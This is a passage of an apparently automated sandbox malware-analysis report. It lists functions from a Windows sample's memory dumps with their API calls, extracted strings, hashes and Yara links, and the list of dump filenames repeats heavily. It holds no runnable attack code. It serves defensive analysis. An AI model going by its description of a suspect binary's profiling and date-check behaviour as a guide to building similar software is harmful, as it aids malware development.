                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 4847987987bb2e01675d2257bf253d71fa738aadb2c27326d473f6fe56acaa95
                          • Instruction ID: 17742673e533d2cc427d7c355e1f8b6f33e93ad371d32dd1431c3bc99c1120e6
                          • Opcode Fuzzy Hash: 4847987987bb2e01675d2257bf253d71fa738aadb2c27326d473f6fe56acaa95
                          • Instruction Fuzzy Hash: E701FC75A04218AFDB14DF98DC49BAEBBBCFB45710F00462AFA06E7390D7785D0086A5
                          Function 00532400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlenmemset
                          • String ID:
                          • API String ID: 3212139465-0
                          • Opcode ID: 289424d2f7dec23f0b86936b2040b97226c8bd66745c2d8d831c039e24a75de0
                          • Instruction ID: c40edcef472882906155e7ddb6eefcc36250f8c456e534705e1e077345690964
                          • Opcode Fuzzy Hash: 289424d2f7dec23f0b86936b2040b97226c8bd66745c2d8d831c039e24a75de0
                          • Instruction Fuzzy Hash: 2581C2B1E0020A9BDF14CF94DC44BAEBBB5BF94300F24806DE508AB281EB759D46CF94
                          Function 00527EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00527F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00527F60
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00527FA5
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00527FD3
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00528007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 98fdc3cd147de905a453f116930cbf877aeef6a91afa6a338a354d6c632431d7
                          • Instruction ID: 07c347c3ad05e15267c6ab658d9f00c746281ed83d9cfac081f78bc7c0b39a3d
                          • Opcode Fuzzy Hash: 98fdc3cd147de905a453f116930cbf877aeef6a91afa6a338a354d6c632431d7
                          • Instruction Fuzzy Hash: D241E23050812ADFCB20DF68E984EAE7BB4FF5A300F114489E805DB391DB70AA65CF91
                          Function 00528050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 005280BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005280EA
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 00528102
                          • lstrlen.KERNEL32(00000000), ref: 00528140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 2e65804f5cabec85f8fbdd6b39fcc78a4f7a4163c2488d29234d68c7beb1e759
                          • Instruction ID: 690fc5b41ccafecdbdf69f9a75b4fe172e05b411bc8c133ece3d959787d5fc0b
                          • Opcode Fuzzy Hash: 2e65804f5cabec85f8fbdd6b39fcc78a4f7a4163c2488d29234d68c7beb1e759
                          • Instruction Fuzzy Hash: 7D41BE35601116ABDB21DFB8E988BAABFF4FF41700F10841DA845D7284EF34D996CB90
                          Function 00531B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00531B72
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053184F
                            • Part of subcall function 00531820: lstrlen.KERNEL32(01196188), ref: 00531860
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 00531887
                            • Part of subcall function 00531820: lstrcat.KERNEL32(00000000,00000000), ref: 00531892
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 005318C1
                            • Part of subcall function 00531820: lstrlen.KERNEL32(00544FA0), ref: 005318D3
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 005318F4
                            • Part of subcall function 00531820: lstrcat.KERNEL32(00000000,00544FA0), ref: 00531900
                            • Part of subcall function 00531820: lstrcpy.KERNEL32(00000000,00000000), ref: 0053192F
                          • sscanf.NTDLL ref: 00531B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00531BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00531BC6
                          • ExitProcess.KERNEL32 ref: 00531BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 6b64f4cfbd2fe831fa1a0d4839d5a38ff6d6b94231e9e9b8f1d240ba53d42df0
                          • Instruction ID: 577b542c0bb9008ae6815c8581a0176a11ae36b890f61a47ef3eab6fc9dc787e
                          • Opcode Fuzzy Hash: 6b64f4cfbd2fe831fa1a0d4839d5a38ff6d6b94231e9e9b8f1d240ba53d42df0
                          • Instruction Fuzzy Hash: 7721E4B5518302AF8350DF65D88585FBBF8FEC9214F408A1EF599C3220E734D5058BAA
                          Function 00533130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00533166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0119B9A0,00000000,00020119,?), ref: 0053318C
                          • RegQueryValueExA.ADVAPI32(?,011AD508,00000000,00000000,00000000,000000FF), ref: 005331A7
                          • RegCloseKey.ADVAPI32(?), ref: 005331B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 12da11c0cec8274511b0babc0ca91172d4ed5893b5971d1087d6829403084194
                          • Instruction ID: 7c57c316696a397f2238a7eece63c29834570e92fd040f5b049ee95000944447
                          • Opcode Fuzzy Hash: 12da11c0cec8274511b0babc0ca91172d4ed5893b5971d1087d6829403084194
                          • Instruction Fuzzy Hash: 6C114276A40209AFD710DB94DC45FBFBBBCF745711F00451AFA05D3690DB7559048BA1
                          Function 00518980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518996
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1D5
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 005189CD
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 99ed57d222cba9ce7b54481e52435cd0b05efa94211d453811857ad6d7e8db98
                          • Instruction ID: 7ddcc9f9099bc97b0bda4994edae318d9fe153609036535cc610e3cdb1c51567
                          • Opcode Fuzzy Hash: 99ed57d222cba9ce7b54481e52435cd0b05efa94211d453811857ad6d7e8db98
                          • Instruction Fuzzy Hash: 932194723006508BE7319A5CE840ABAFB99FFA1761F15093BF151CB241CB71DC81C7A5
                          Function 00518850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518883
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: df4474d9397da14d31927c61d9113ea27b07e91f8995bec2b0c3c042d0266a7f
                          • Instruction ID: 3fd3293d7eeb50476b7ccb79b2db457defc8825ee06423728644e822592aaa7c
                          • Opcode Fuzzy Hash: df4474d9397da14d31927c61d9113ea27b07e91f8995bec2b0c3c042d0266a7f
                          • Instruction Fuzzy Hash: 1731B5B5E005159BCB08DF58C891AAEBBB6FB88310F148269E905EB385DB30AD41CB91
                          Function 00535910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535922
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: c604123836ceffea98e4cf0f794e8874a3f5b60985eb4a1e44703b2f3f81defc
                          • Instruction ID: d1cba1799f135d9b393980a0fc0ee14962fab9864b974404b4886dfc1d3b4275
                          • Opcode Fuzzy Hash: c604123836ceffea98e4cf0f794e8874a3f5b60985eb4a1e44703b2f3f81defc
                          • Instruction Fuzzy Hash: DA115E32304B41CBD7328B2CE800B1ABFE1BBD5761F251A5EE4D1CB696E761D841C7A5
                          Function 00533CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0053A430,000000FF), ref: 00533D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00533D27
                          • wsprintfA.USER32 ref: 00533D37
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 57fcbc4421652774c6256263846af00bc6cf04d748e8727aa1fb112389c2adfb
                          • Instruction ID: 7320d864757cf760686637ae3e8ad5cf7f3f5f954020196d3e2839a1047edb80
                          • Opcode Fuzzy Hash: 57fcbc4421652774c6256263846af00bc6cf04d748e8727aa1fb112389c2adfb
                          • Instruction Fuzzy Hash: F601C075640304BBE7209B54DC4AF6BBBB8FB46B61F004116FA05972E0D7B81900C6AA
                          Function 0053926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00539279
                            • Part of subcall function 005387FF: __amsg_exit.LIBCMT ref: 0053880F
                          • __amsg_exit.LIBCMT ref: 00539299
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
